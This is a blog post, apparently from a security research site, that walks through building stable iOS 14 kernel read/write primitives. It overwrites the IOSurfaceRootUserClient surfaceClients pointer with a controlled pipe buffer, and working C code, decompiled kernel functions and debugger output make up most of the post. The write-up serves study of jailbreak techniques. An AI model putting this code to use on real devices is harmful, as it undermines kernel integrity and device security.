{"id":3135,"date":"2025-03-11T01:26:45","date_gmt":"2025-03-10T16:26:45","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3135"},"modified":"2025-03-11T01:26:47","modified_gmt":"2025-03-10T16:26:47","slug":"practice-implementing-kernel-r-w-primitive-using-pipe-and-iosurface","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3135","title":{"rendered":"[Practice] Implementing kernel r\/w primitive using pipe and IOSurface"},"content":{"rendered":"\n

Recently, I\u2019m researching how iOS jailbreak technique was used from old to nowadays.<\/p>\n\n\n\n

At this time, I\u2019m going to explain how kernel r\/w primitive has been achieved that was used in pattern-f\u2019s TQ-pre-jailbreak.<\/a><\/p>\n\n\n\n

Beginning of start<\/h1>\n\n\n\n

Most of iOS jailbreak tools has kernel r\/w functions despite of tfp0\/hsp4 technique has been patched. (But checkm8, palera1n jailbreaks can still use tfp0)<\/p>\n\n\n\n

For example: unc0ver has libkrw libraries, Taurine has libkernrw library, and Dopamine can calls jbdInitPPLRW or jbclient_initialize_primitives in libjailbreak libraries to obtain kernel r\/w from userspace.<\/p>\n\n\n\n

So, we can easily starting research without having to implement kernel exploit.<\/p>\n\n\n\n

At this moment my environment is on iPhone 8, iOS 14.4.2, so I\u2019m going to use libkernrw library.<\/p>\n\n\n\n

Summary: obtaining krw primitive using pipe<\/h1>\n\n\n\n

The pipe<\/code> system function usually used to communicate between child process and parent process. We have one pairs of file descriptor if call pipe<\/code>. One is read purpose, the other is write purpose.<\/p>\n\n\n\n

Using this pipe<\/code> function, we can allocate kernel memory by arbitrary size.<\/p>\n\n\n\n

Because, when calling pipe<\/code> and write<\/code> to fd, then it internally calls pipespace<\/code> to allocate kva for pipe circular buffer.<\/p>\n\n\n\n

\/*\n * perform a write of n bytes into the read side of buffer. Since\n * pipes are unidirectional a write is meant to be read by the otherside only.\n *\/\nstatic int\npipe_write(struct fileproc *fp, struct uio *uio, __unused int flags,\n    __unused vfs_context_t ctx)\n{\n\tint error = 0;\n\tsize_t orig_resid;\n\tint pipe_size;\n\tstruct pipe *wpipe, *rpipe;\n\t...\n\n\tpipe_size = 0;\n\n\t\/*\n\t * need to allocate some storage... we delay the allocation\n\t * until the first write on fd[0] to avoid allocating storage for both\n\t * 'pipe ends'... most pipes are half-duplex with the writes targeting\n\t * fd[1], so allocating space for both ends is a waste...\n\t *\/\n\n\tif (wpipe->pipe_buffer.buffer == 0 || (\n\t\t    (unsigned)orig_resid > wpipe->pipe_buffer.size - wpipe->pipe_buffer.cnt &&\n\t\t    amountpipekva < maxpipekva)) {\n\t\tpipe_size = choose_pipespace(wpipe->pipe_buffer.size, wpipe->pipe_buffer.cnt + orig_resid);\n\t}\n\tif (pipe_size) {\n\t\t\/*\n\t\t * need to do initial allocation or resizing of pipe\n\t\t * holding both structure and io locks.\n\t\t *\/\n\t\tif ((error = pipeio_lock(wpipe, 1)) == 0) {\n\t\t\tif (wpipe->pipe_buffer.cnt == 0) {\n\t\t\t\terror = pipespace(wpipe, pipe_size);\n\t\t\t} else {\n\t\t\t\terror = expand_pipespace(wpipe, pipe_size);\n\t\t\t}\n\n\t\t\tpipeio_unlock(wpipe);\n\n\t\t\t\/* allocation failed *\/\n\t\t\tif (wpipe->pipe_buffer.buffer == 0) {\n\t\t\t\terror = ENOMEM;\n\t\t\t}\n\t\t}\n...\n\n\treturn error;\n}<\/pre>\n\n\n\n
With controlling memory in allocated pipe space by write<\/code>, can be achieved kernel r\/w primitive using IOSurface by overwriting rpipe\u2019s pipe_base to IOSurfaceRootUserClient_addr\u2019s surfaceClients. (rpipe means pipe for read purpose)<\/p>\n\n\n\n
Prepare to use IOSurfaceClient<\/h1>\n\n\n\n
To use and allocate IOSurface objects, we need to call IOServiceGetMatchingService<\/code> to search IOSurfaceRoot and IOServiceOpen<\/code> to open connection between IOSurface objects.<\/p>\n\n\n\n
void IOSurfaceRoot_init(void)\n{\n    io_service_t IOSurfaceRoot = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching(\"IOSurfaceRoot\"));\n    if (IOSurfaceRoot == MACH_PORT_NULL)\n    {\n        printf(\"Couldn't find IOSurfaceRoot.\\\\n\");   exit(1);\n    }\n    \n    if (IOServiceOpen(IOSurfaceRoot, mach_task_self(), 0, &IOSurfaceRootUserClient) != KERN_SUCCESS)\n    {\n        printf(\"Could not open IOSurfaceRootUserClient.\\\\n\");   exit(1);\n    }\n}<\/pre>\n\n\n\n
Calling IOSurfaceRootUserClient::s_create_surface_fast_path<\/h2>\n\n\n\n
Mostly, at that time, It makes to me analyzing IOSurfaceRootUserClient\u2019s internal function just like above function is one of hurdle to figure out what does it do.<\/p>\n\n\n\n
Because there\u2019s no function symbol in kernelcache and nowhere documented API.<\/p>\n\n\n\n
But since macOS 13.0+ Kernel KDK, there are symbols in IOSurface.kext.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Thanks for that info, I could figure out address where functions is in iPhone kernelcache.<\/p>\n\n\n\n
Why we need to call s_create_surface_fast_path<\/code> function before using primitive? Because when using IOSurface primitive, now internally kread32 calls IOSurfaceRootUserClient::get_ycbcrmatrix<\/code> and kwrite64 calls IOSurfaceRootUserClient::s_set_indexed_timestamp<\/code>.<\/p>\n\n\n\n
These two functions both call retainSurface<\/code> , it checks if SurfaceClient can be obtained or not, so that\u2019s why need to call s_create_surface_fast_path<\/code>. Below is the code from IOSurface.kext in macOS 13.0 KDK.<\/p>\n\n\n\n
__int64 __fastcall IOSurfaceRootUserClient::get_ycbcrmatrix(IOLock **this, unsigned int a2, unsigned int *a3)\n{\n  IOSurface *v3; \/\/ x0\n  IOSurface *v4; \/\/ x19\n  __int64 YCbCrMatrix; \/\/ x20\n\n  v3 = (IOSurface *)IOSurfaceRootUserClient::retainSurface(this, a2);\n  if ( !v3 )\n    return 0xE00002C2LL;\n  v4 = v3;\n  YCbCrMatrix = IOSurface::getYCbCrMatrix(v3);\n  (*(void (__fastcall **)(IOSurface *))(*(_QWORD *)v4 + 40LL))(v4);\n  return YCbCrMatrix;\n}<\/pre>\n\n\n\n
__int64 __fastcall IOSurfaceRootUserClient::set_indexed_timestamp(\n        IOLock **this,\n        unsigned int a2,\n        unsigned __int64 a3,\n        unsigned __int64 a4)\n{\n  IOSurface *v6; \/\/ x0\n  IOSurface *v7; \/\/ x19\n  __int64 v8; \/\/ x20\n\n  v6 = (IOSurface *)IOSurfaceRootUserClient::retainSurface(this, a2);\n  if ( !v6 )\n    return 0xE00002C2LL;\n  v7 = v6;\n  v8 = IOSurface::setIndexedTimestamp(v6, a3, a4);\n  (*(void (__fastcall **)(IOSurface *))(*(_QWORD *)v7 + 40LL))(v7);\n  return v8;\n}<\/pre>\n\n\n\n
Also, how do we know to IOConnectCallMethod’s selector number is 6<\/code> to call s_create_surface_fast_path<\/code>?<\/p>\n\n\n\n
IOUserClient::externalMethod internally calls IOSurfaceRootUserClient::sMethodDescs, so if selector is 6<\/code>, then IOSurfaceRootUserClient::externalMethod<\/code> \u2019s a2<\/code> is 6.<\/p>\n\n\n\n
Below is the code from kernelcache in iPhone 8 14.4.2.<\/p>\n\n\n\n
__int64 __fastcall IOSurfaceRootUserClient::externalMethod(\n        IOUserClient *a1,\n        __int64 a2,\n        IOExternalMethodArguments *a3,\n        IOExternalMethodDispatch *a4,\n        IOUserClient *a5,\n        void *a6)\n{\n  if ( (unsigned int)a2 > 0x2B )\n    return IOUserClient::externalMethod(a1, a2, a3, a4, a5, a6);\n  if ( !a3->asyncReference || (_DWORD)a2 == 0x28 || (_DWORD)a2 == 0x11 )\n  {\n    a4 = (IOExternalMethodDispatch *)&IOSurfaceRootUserClient::sMethodDescs[3 * (unsigned int)a2];\n    a5 = a1;\n    return IOUserClient::externalMethod(a1, a2, a3, a4, a5, a6);\n  }\n  return 0xE00002C2LL;\n}<\/pre>\n\n\n\n
iphone 8 14.4.2\nselector \/ address \/ function\n\n__DATA_CONST:__const:FFFFFFF007866D28                         ; __int64 (__fastcall *IOSurfaceRootUserClient::sMethodDescs[3])(IOSurfaceRootUserClient *__hidden this, IOSurfaceRootUserClient *, void *, IOExternalMethodArguments *)\n__DATA_CONST:__const:FFFFFFF007866D28 80 63 42 08 F0 FF FF FF __ZN23IOSurfaceRootUserClient12sMethodDescsE DCQ __ZN23IOSurfaceRootUserClient16s_create_surfaceEPS_PvP25IOExternalMethodArguments\n__DATA_CONST:__const:FFFFFFF007866D28                                                                 ; DATA XREF: IOSurfaceRootUserClient::externalMethod(uint,IOExternalMethodArgumentsOpaque *):loc_FFFFFFF0084294AC\u2193o\n0 __DATA_CONST:__const:FFFFFFF007866D28                                                                 ; IOSurfaceRootUserClient::s_create_surface(IOSurfaceRootUserClient*,void *,IOExternalMethodArguments *)\n1 __DATA_CONST:__const:FFFFFFF007866D40 60 64 42 08 F0 FF FF FF                 DCQ __ZN23IOSurfaceRootUserClient17s_release_surfaceEPS_PvP25IOExternalMethodArguments ; IOSurfaceRootUserClient::s_release_surface(IOSurfaceRootUserClient*,void *,IOExternalMethodArguments *)\n2 __DATA_CONST:__const:FFFFFFF007866D58 6C 64 42 08 F0 FF FF FF                 DCQ __ZN23IOSurfaceRootUserClient14s_lock_surfaceEPS_PvP25IOExternalMethodArguments ; IOSurfaceRootUserClient::s_lock_surface(IOSurfaceRootUserClient*,void *,IOExternalMethodArguments *)\n3 __DATA_CONST:__const:FFFFFFF007866D70 84 64 42 08 F0 FF FF FF                 DCQ __ZN23IOSurfaceRootUserClient16s_unlock_surfaceEPS_PvP25IOExternalMethodArguments ; IOSurfaceRootUserClient::s_unlock_surface(IOSurfaceRootUserClient*,void *,IOExternalMethodArguments *)\n4 __DATA_CONST:__const:FFFFFFF007866D88 9C 64 42 08 F0 FF FF FF                 DCQ __ZN23IOSurfaceRootUserClient16s_lookup_surfaceEPS_PvP25IOExternalMethodArguments ; IOSurfaceRootUserClient::s_lookup_surface(IOSurfaceRootUserClient*,void *,IOExternalMethodArguments *)\n5 __DATA_CONST:__const:FFFFFFF007866DA0 AC 64 42 08 F0 FF FF FF                 DCQ __ZN23IOSurfaceRootUserClient17s_set_ycbcrmatrixEPS_PvP25IOExternalMethodArguments ; IOSurfaceRootUserClient::s_set_ycbcrmatrix(IOSurfaceRootUserClient*,void *,IOExternalMethodArguments *)\n6 __DATA_CONST:__const:FFFFFFF007866DB8 BC 64 42 08 F0 FF FF FF                 DCQ __ZN23IOSurfaceRootUserClient26s_create_surface_fast_pathEPS_PvP25IOExternalMethodArguments ; IOSurfaceRootUserClient::s_create_surface_fast_path(IOSurfaceRootUserClient*,void *,IOExternalMethodArguments *)\n...<\/pre>\n\n\n\n
Now we know how to call function by selector, figured out select 6<\/code> calls sub_FFFFFFF0084264BC<\/code>, so that is s_create_surface_fast_path<\/code>. Like this, sub_FFFFFFF0084264DC<\/code> is s_get_ycbcrmatrix<\/code> , sub_FFFFFFF008426E44<\/code> is s_set_indexed_timestamp<\/code>.<\/p>\n\n\n\n
During analyzing s_create_surface_fast_path<\/code> function, figuring out _IOSurfaceFastCreateArgs<\/code> and IOSurfaceLockResult\u2019s<\/code> struct was hurdle to me, but now we can call from userspace and obtain surface_id. surface_id usually determine if we reused object when using heap spray, but at this time we already have kernel r\/w, so let me research later. Below is the code how to call s_create_surface_fast_path<\/code>.<\/p>\n\n\n\n
uint32_t iosurface_s_create_surface_fast_path(void)\n{\n    struct _IOSurfaceFastCreateArgs {\n        uint64_t address;\n        uint32_t width;\n        uint32_t height;\n        uint32_t pixel_format;\n        uint32_t bytes_per_element;\n        uint32_t bytes_per_row;\n        uint32_t alloc_size;\n    };\n\n    struct IOSurfaceLockResult {\n        uint8_t _pad1[0x18];\n        uint32_t surface_id;\n        uint8_t _pad2[0xF60-0x18-0x4];\n    };\n    \n    struct _IOSurfaceFastCreateArgs create_args = { .alloc_size = (uint32_t)vm_real_kernel_page_size };\n    struct IOSurfaceLockResult lock_result = {0};\n    uint64_t lock_result_size = sizeof(lock_result);\n\n    IOConnectCallMethod(\n            IOSurfaceRootUserClient,\n            6,\n            NULL, 0,\n            &create_args, sizeof(create_args),\n            NULL, NULL,\n            &lock_result, (size_t *)&lock_result_size);\n    \n    return lock_result.surface_id;\n}<\/pre>\n\n\n\n
Create pipe<\/h2>\n\n\n\n
For allocating kernel memory, create_pipes<\/code> make pipe_buffer<\/code> using malloc and stores pipefds<\/code> for handle later.<\/p>\n\n\n\n
pipe_spray function<\/code> writes pipe_buffer<\/code> to wfd<\/code>, then that makes allocating kernel memory as much as allocated size for pipe buffer before.<\/p>\n\n\n\n
At the end, It calls read_pipe<\/code> later, and I\u2019ll explain why it needs to be called later.<\/p>\n\n\n\n
\/\/ pipe\n\/\/ bsd\/kern\/sys_pipe.c:393\nint *\ncreate_pipes(void) {\n    \/\/ Allocate our initial array.\n    size_t capacity = 1;\n    int *pipefds = calloc(2 * capacity, sizeof(int));\n    \/\/ Create as many pipes as we can.\n    size_t count = 0;\n\n    \/\/ First create our pipe fds.\n    int fds[2] = { -1, -1 };\n    int error = pipe(fds);\n    \n    \/\/ Unfortunately pipe() seems to return success with invalid fds once we've\n    \/\/ exhausted the file limit. Check for this.\n    if (error != 0 || fds[0] < 0 || fds[1] < 0) {\n        pipe_close(fds);\n        exit(1);\n    }\n    \/\/ Mark the write-end as nonblocking.\n    \/\/set_nonblock(fds[1]);\n    \/\/ Store the fds.\n    pipefds[0] = fds[0];\n    pipefds[1] = fds[1];\n\n    \/\/ assert(count == capacity && \"can't alloc enough pipe fds\");\n    \/\/ Truncate the array to the smaller size.\n    \/\/ int *new_pipefds = realloc(pipefds, 2 * count * sizeof(int));\n    \/\/ assert(new_pipefds != NULL);\n    \/\/ Return the count and the array.\n    \/\/ *pipe_count = count;\n    return pipefds;\n}\n\nsize_t\npipe_spray(const int *pipefds, size_t pipe_count,\n        void *pipe_buffer, size_t pipe_buffer_size) {\n    size_t write_size = pipe_buffer_size - 1;\n    size_t pipes_filled = 0;\n    for (size_t i = 0; i < pipe_count; i++) {\n        \/\/ Fill the write-end of the pipe with the buffer. Leave off the last byte.\n        int wfd = pipefds[i + 1];\n        ssize_t written = write(wfd, pipe_buffer, write_size);\n        if (written != write_size) {\n            \/\/ This is most likely because we've run out of pipe buffer memory. None of\n            \/\/ the subsequent writes will work either.\n            break;\n        }\n        pipes_filled++;\n    }\n    return pipes_filled;\n}\n\n\/\/create pipes\n\tpipefds = create_pipes();\n\tpipe_buffer = (uint8_t *)malloc(pipe_buffer_size);\n\t\/\/memset_pattern4 = \uba54\ubaa8\ub9ac \uc124\uc815 \ud568\uc218\ub85c, 4\ubc14\uc774\ud2b8 \ud328\ud134\uc744 \uc0ac\uc6a9\ud558\uc5ec \ud2b9\uc815 \uba54\ubaa8\ub9ac \uc601\uc5ed\uc744 \ucc44\uc6b8 \ub54c \uc0ac\uc6a9, \ub530\ub77c\uc11c pipe 4\uae00\uc790\ub85c \ucc44\uc6cc\uc9d0\n\tmemset_pattern4(pipe_buffer, \"ABCD\", pipe_buffer_size);\t\/\/<- work even if disable this code.\n\tpipe_spray(pipefds, 1, pipe_buffer, pipe_buffer_size);\n\tread_pipe();\t<\/pre>\n\n\n\n
Find port for IOSurfaceRootUserClient<\/h2>\n\n\n\n
Next, we need to find port that we opened connection between IOSurface objects.<\/p>\n\n\n\n
Inter-Process communication can achieved via Ports, so we need to find port for primitive.<\/p>\n\n\n\n
Using kernproc<\/code>, we can distinguish certain process by reading p_pid<\/code> of struct proc<\/code>, and enumerate process list by reading p_list_le_prev<\/code> of struct proc<\/code> . This implements in proc_of_pid<\/code> function.<\/p>\n\n\n\n
Next, we can access field of structure sequentially like below picture. Remind that ipc_entry\u2019s ie_object can be type casted with struct ipc_port<\/code>.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
uint64_t proc_of_pid(pid_t pid) {\n    uint64_t proc = kread64(ksym(KSYMBOL_KERNPROC));\n    \n    while (1) {\n        if(kread32(proc + off_p_pid) == pid) {\n            return proc;\n        }\n        proc = kread64(proc + off_p_list_le_prev);\n        if(!proc) {\n            return -1;\n        }\n    }\n    \n    return 0;\n}\n\nuint64_t task_self_addr() {\n    uint64_t proc = proc_of_pid(getpid());\n    uint64_t task = kread64(proc + off_p_task);\n    return task;\n}\n\nuint64_t find_port(mach_port_name_t port) {\n    uint64_t task_addr = task_self_addr();\n    \n    uint64_t itk_space = kread64(task_addr + off_task_itk_space);\n    \n    uint64_t is_table = kread64(itk_space + off_ipc_space_is_table);\n    \n    uint32_t port_index = port >> 8;\n    const int sizeof_ipc_entry_t = 0x18;\n    \n    uint64_t port_addr = kread64(is_table + (port_index * sizeof_ipc_entry_t));\n    return port_addr;\n}\n\n\/\/build_stable_kmem_api\n\tuint64_t IOSurfaceRootUserClient_port = find_port(IOSurfaceRootUserClient);\n\tIOSurfaceRootUserClient_addr = kread64(IOSurfaceRootUserClient_port + off_ipc_port_ip_kobject);IOSurfaceRootUserClient_addr = kread64(IOSurfaceRootUserClient_port + off_ipc_port_ip_kobject);<\/pre>\n\n\n\n
Build stable kernel r\/w primitive<\/h2>\n\n\n\n
Since we know IOSurfaceRootUserClient\u2019s port, now overwrite its port to pipe_base<\/code>. pipe_base<\/code> means pipe fd\u2019s for read buffer. We can access pipe buffer(pipe_base) like below pictures.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
uint64_t surfaceClients = 0;\nuint64_t rpipe = 0;\nuint64_t wpipe = 0;\nvoid build_stable_kmem_api()\n{\n    uint64_t p_fd = kread64(proc_of_pid(getpid()) + off_p_pfd); \n    uint64_t fd_ofiles = kread64(p_fd); \n    uint64_t rpipe_fp = kread64(fd_ofiles + pipefds[0] * 8);\n    uint64_t r_fp_glob = kread64(rpipe_fp + off_fp_fglob);\n    rpipe = kread64(r_fp_glob + off_fg_data); \n    uint64_t wpipe_fp = kread64(fd_ofiles + pipefds[1] * 8);\n    uint64_t w_fp_glob = kread64(wpipe_fp + off_fp_fglob);\n    wpipe = kread64(w_fp_glob + off_fg_data); \n    printf(\"rpipe = 0x%llx, wpipe = 0x%llx\\\\n\", rpipe, wpipe);\n    \n    uint32_t rpipe_cnt = kread32(rpipe + off_pb_cnt);\n    uint32_t wpipe_cnt = kread32(wpipe + off_pb_cnt);\n    printf(\"rpipe_cnt = 0x%x, wpipe_cnt = 0x%x\\\\n\", rpipe_cnt, wpipe_cnt);\n\n    pipe_base = kread64(rpipe + off_pb_buffer); \n    printf(\"pipe_base = 0x%llx\\\\n\", pipe_base);\n    \n    \/\/0x118?\n    surfaceClients = kread64(IOSurfaceRootUserClient_addr + 0x118);\n    printf(\"surfaceClients = 0x%llx\\\\n\", surfaceClients);\n\n    kwrite64(IOSurfaceRootUserClient_addr + 0x118, pipe_base);\n}<\/pre>\n\n\n\n
At this time, we have curious about how 0x118 offset fields calculated and it represents 0x118<\/code> is surfaceClients field of IOSurfaceRootUserClient structure, the source is from oob_timestamp exploit and \u201cExploiting IOSurface 0\u201d presentation. At least we know kread32 use get_ycbcmatrix<\/code> and kwrite64 use set_indexed_timestamp<\/code>, and when analyzed that functions, it reads something from a1 + 0x118<\/code>…, so I guess that\u2019s what we use base address to obtain primitive. Now, let\u2019s see what happened if we overwrite pipe_base<\/code> to IOSurfaceRootUserClient_addr + 0x118<\/code>.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\"\"<\/figure>\n\n\n\n
kpri_read32<\/h2>\n\n\n\n
void read_pipe()\n{\n    size_t read_size = pipe_buffer_size - 1;\n    read(pipefds[0], pipe_buffer, read_size);\n}\n\nvoid write_pipe()\n{\n    size_t write_size = pipe_buffer_size - 1;\n    write(pipefds[1], pipe_buffer, write_size);\n}\n\nuint32_t kpri_read32(uint64_t where) {\n    struct fake_client *p = (void *)pipe_buffer;\n\n    p->uc_obj = pipe_base + 0x10;\n    p->surf_obj = where - 0xb4;\n\n\t\twrite_pipe();\n    uint32_t v = iosurface_s_get_ycbcrmatrix();\n    read_pipe();\n    \n    return v;\n};<\/pre>\n\n\n\n
Above code is implementation of kread32 primitive. I was so curious about 3 things. How fake_client structure can be created, and why add +0x10<\/code> to pipe_base, and why substract -0xb4<\/code> from where?<\/p>\n\n\n\n
When I set breakpoint after called LDR X8, [X19,#0x118]<\/code>, x8 register has 0xffffffe4cdca1000<\/code> which means pipe_base<\/code> representing rpipe\u2019s pipe_buffer, and p->uc_obj<\/code> , p->surf_obj<\/code> has been modified by calling write_pipe<\/code> (See x\/32gx 0xffffffe4cdca1000\u2026)<\/p>\n\n\n\n
Remind that\u2026 offsetof(struct fake_client, uc_obj) = 0x8<\/code> offsetof(struct fake_client, surf_obj) = 0x50<\/code><\/p>\n\n\n\n
bp set in...\ncom.apple.iokit.IOSurface:__text:FFFFFFF008428114+0x40\n__ZN23IOSurfaceRootUserClient15get_ycbcrmatrixEjPj\n0xFFFFFFF008428114+0x40 = 0xFFFFFFF008428154\n\n Process 1 stopped\n * thread #2, stop reason = instruction step into\n     frame #0: 0xfffffff0213cc154\n ->  0xfffffff0213cc154: ldr    x0, [x8, w22, uxtw #3]\n     0xfffffff0213cc158: cbz    x0, 0xfffffff0213cc168\n     0xfffffff0213cc15c: mov    x1, x21\n     0xfffffff0213cc160: bl     0xfffffff0213c6500\n Target 1: (kernelcache.iPhone10,1.18D70) stopped.\n (lldb) reg read x8\n       x8 = 0xffffffe4cdca1000\n (lldb) x\/32gx 0xffffffe4cdca1000\n 0xffffffe4cdca1000: 0x4443424144434241 0xffffffe4cdca1010 <- p->uc_obj = pipe_base + 0x10; offsetof(uc_obj, p) = 0x8;\n 0xffffffe4cdca1010: 0x4443424144434241 0x4443424144434241\n 0xffffffe4cdca1020: 0x4443424144434241 0x4443424144434241\n 0xffffffe4cdca1030: 0x4443424144434241 0x4443424144434241\n 0xffffffe4cdca1040: 0x4443424144434241 0x4443424144434241\n 0xffffffe4cdca1050: 0xfffffff01ffa7f4c 0x4443424144434241 <- p->surf_obj = where - 0xb4; offsetof(surf_obj, p) = 0x50;\n 0xffffffe4cdca1060: 0x4443424144434241 0x4443424144434241\n 0xffffffe4cdca1070: 0x4443424144434241 0x4443424144434241<\/pre>\n\n\n\n
Why offsetof(struct fake_client, uc_obj)<\/code> = 0x8? Because i_scalar[0] value was 1 when call s_get_ycbcrmatrix<\/code>, so its value passes to a2<\/code> in IOSurfaceRootUserClient::get_ycbcrmatrix(__int64 a1, unsigned int a2, _DWORD *a3).<\/code><\/p>\n\n\n\n
Then v7<\/code> represents \u2026 + 8LL * a2<\/code> , so that\u2019s why offset size is 0x8.<\/p>\n\n\n\n
uint32_t iosurface_s_get_ycbcrmatrix(void)\n{\n    uint64_t i_scalar[1] = { 1 }; \/\/ fixed, first valid client obj   \/\/will set IOSurfaceRootUserClient::get_ycbcrmatrix's a2\n    uint64_t o_scalar[1];\n    uint32_t i_count = 1;\n    uint32_t o_count = 1;\n\n    kern_return_t kr = IOConnectCallMethod(\n            IOSurfaceRootUserClient,\n            8, \/\/ s_get_ycbcrmatrix\n            i_scalar, i_count,\n            NULL, 0,\n            o_scalar, &o_count,\n            NULL, NULL);\n    if (kr != KERN_SUCCESS) {\n        printf(\"s_get_ycbcrmatrix error: 0x%x\\\\n\", kr);\n        return 0;\n    }\n    return (uint32_t)o_scalar[0];\n}<\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
So, v7<\/code> value will now have 0xffffffe4cdca1010<\/code> which means pipe_base + 0x10<\/code> , and v7<\/code> passes to IOSurface::getYCbCrMatrix\u2019<\/code>s a1<\/code>. let\u2019s see go further.<\/p>\n\n\n\n
IOSurface::getYCbCrMatrix<\/code> calls sub_FFFFFFF00841FA60<\/code>, and its arguments has *(_QWORD *)(a1 + 0x40)<\/code>.<\/p>\n\n\n\n
If calculated correctly, pipe_base+0x10+0x40<\/code> , so it represents offsetof(struct fake_client, surf_obj) = 0x50<\/code>. If we read pipe_base+0x10+0x40<\/code> pointer, It has 0xfffffff01ffa7f4c<\/code> that we wanted to read kernel address. But this address substracted by 0xb4 at this moment, and I explain for now.<\/p>\n\n\n\n
__int64 __fastcall IOSurface::getYCbCrMatrix(__int64 a1, _DWORD *a2)\n{\n  *a2 = sub_FFFFFFF00841FA60(*(_QWORD *)(a1 + 0x40));\/\/ a1 = pipe_base + 0x10\n  return 0LL;\n}<\/pre>\n\n\n\n
Yes, this sub_FFFFFFF00841FA60<\/code> function explains everything. It reads from a1<\/code> by adding 0xB4<\/code>.<\/p>\n\n\n\n
__int64 __fastcall sub_FFFFFFF00841FA60(__int64 a1)\n{\n  return *(unsigned int *)(a1 + 0xB4);\n}<\/pre>\n\n\n\n
Next, Why we need to call read_pipe<\/code> after uint32_t v = iosurface_s_get_ycbcrmatrix();<\/code>? Because If we don\u2019t read_pipe<\/code>, the buffer that we read will pilling up, so expand_pipespace<\/code> will be called continuously. then we can\u2019t control pipe buffer via pipe_base<\/code> later.<\/p>\n\n\n\n
\/\/https:\/\/github.com\/apple-oss-distributions\/xnu\/blob\/xnu-7195.81.3\/bsd\/kern\/sys_pipe.c#L901\n\n\/*\n * perform a write of n bytes into the read side of buffer. Since\n * pipes are unidirectional a write is meant to be read by the otherside only.\n *\/\nstatic int\npipe_write(struct fileproc *fp, struct uio *uio, __unused int flags,\n    __unused vfs_context_t ctx) {\n...\n\tif (pipe_size) {\n\t\t\/*\n\t\t * need to do initial allocation or resizing of pipe\n\t\t * holding both structure and io locks.\n\t\t *\/\n\t\tif ((error = pipeio_lock(wpipe, 1)) == 0) {\n\t\t\tif (wpipe->pipe_buffer.cnt == 0) {\n\t\t\t\terror = pipespace(wpipe, pipe_size);\n\t\t\t} else {\n\t\t\t\terror = expand_pipespace(wpipe, pipe_size);\t\/\/ <- this code expand it.\n\t\t\t}\n...\n}\n\n\/*\n * expand the size of pipe while there is data to be read,\n * and then free the old buffer once the current buffered\n * data has been transferred to new storage.\n * Required: PIPE_LOCK and io lock to be held by caller.\n * returns 0 on success or no expansion possible\n *\/\nstatic int\nexpand_pipespace(struct pipe *p, int target_size)<\/pre>\n\n\n\n
kpri_write64<\/h2>\n\n\n\n
void kpri_write64(uint64_t where, uint64_t what) {\n    struct fake_client *p = (void *)pipe_buffer;\n\n    p->uc_obj = pipe_base + 0x10;\n    p->surf_obj = pipe_base;\n    p->shared_RW = where;\n    \n    write_pipe();\n\n    iosurface_s_set_indexed_timestamp(what);\n    read_pipe();\n};<\/pre>\n\n\n\n
Above code is implementation of kwrite64 primitive. Now I have only one curious thing. How p->shared_RW<\/code> make possible to be value of kernel address for write purpose?<\/p>\n\n\n\n
Remind that\u2026 offsetof(struct fake_client, shared_RW) = 0x360<\/code><\/p>\n\n\n\n
See v9 = *(QWORD *)(*(QWORD *)(a1 + 0x118) + 8LL * a2);<\/code>, not only v9<\/code> represents pipe_base<\/code> but also *(_QWORD *)(v9 + 0x40)<\/code> represents pipe_base<\/code> at this time.<\/p>\n\n\n\n
__int64 __fastcall IOSurfaceRootUserClient::set_indexed_timestamp(\n        __int64 a1,\n        unsigned int a2,\n        unsigned __int64 a3,\n        __int64 a4)\n{\n  __int64 v8; \/\/ x20\n  __int64 v9; \/\/ x8\n\n  v8 = 0xE00002C2LL;\n  lck_mtx_lock(*(lck_mtx_t **)(a1 + 0xD8));\n  if ( a2 )\n  {\n    if ( *(_DWORD *)(a1 + 0x120) > a2 )\n    {\n      v9 = *(_QWORD *)(*(_QWORD *)(a1 + 0x118) + 8LL * a2);\n      if ( v9 )\n        v8 = IOSurface::setIndexedTimestamp(*(_QWORD *)(v9 + 0x40), a3, a4);\n    }\n  }\n  lck_mtx_unlock(*(lck_mtx_t **)(a1 + 216));\n  return v8;\n}<\/pre>\n\n\n\n
Since p->shared_RW<\/code> meaning a1+0x360<\/code> , so It will be target of kernel adddress. i_scalar[2] passes to IOSurface::setIndexedTimestamp's a3<\/code> , so its value will be written to target.<\/p>\n\n\n\n
void iosurface_s_set_indexed_timestamp(uint64_t v)\n{\n    uint64_t i_scalar[3] = {\n        1, \/\/ fixed, first valid client obj\n        0, \/\/ index\n        v, \/\/ value\n    };\n    uint32_t i_count = 3;\n\n    kern_return_t kr = IOConnectCallMethod(\n            IOSurfaceRootUserClient,\n            33, \/\/ s_set_indexed_timestamp\n            i_scalar, i_count,\n            NULL, 0,\n            NULL, NULL,\n            NULL, NULL);\n    if (kr != KERN_SUCCESS) {\n        printf(\"s_set_indexed_timestamp error: 0x%x\\\\n\", kr);\n    }\n}<\/pre>\n\n\n\n
__int64 __fastcall IOSurface::setIndexedTimestamp(__int64 a1, unsigned __int64 a2, __int64 a3)\n{\n  __int64 result; \/\/ x0\n\n  if ( a2 > 3 )\n    return 3758097090LL;\n  result = 0LL;\n  *(_QWORD *)(*(_QWORD *)(a1 + 0x360) + 8 * a2) = a3;\n  return result;\n}<\/pre>\n","protected":false},"excerpt":{"rendered":"
Recently, I\u2019m researching how iOS jailbreak technique was used from old to nowadays. At this time, I\u2019m going to explain how kernel r\/w primitive has been achieved that was used in pattern-f\u2019s TQ-pre-jailbreak. Beginning of start Most of iOS jailbreak tools has kernel r\/w functions despite of tfp0\/hsp4 technique has been patched. (But checkm8, palera1n… \ub354 \ubcf4\uae30 »[Practice] Implementing kernel r\/w primitive using pipe and 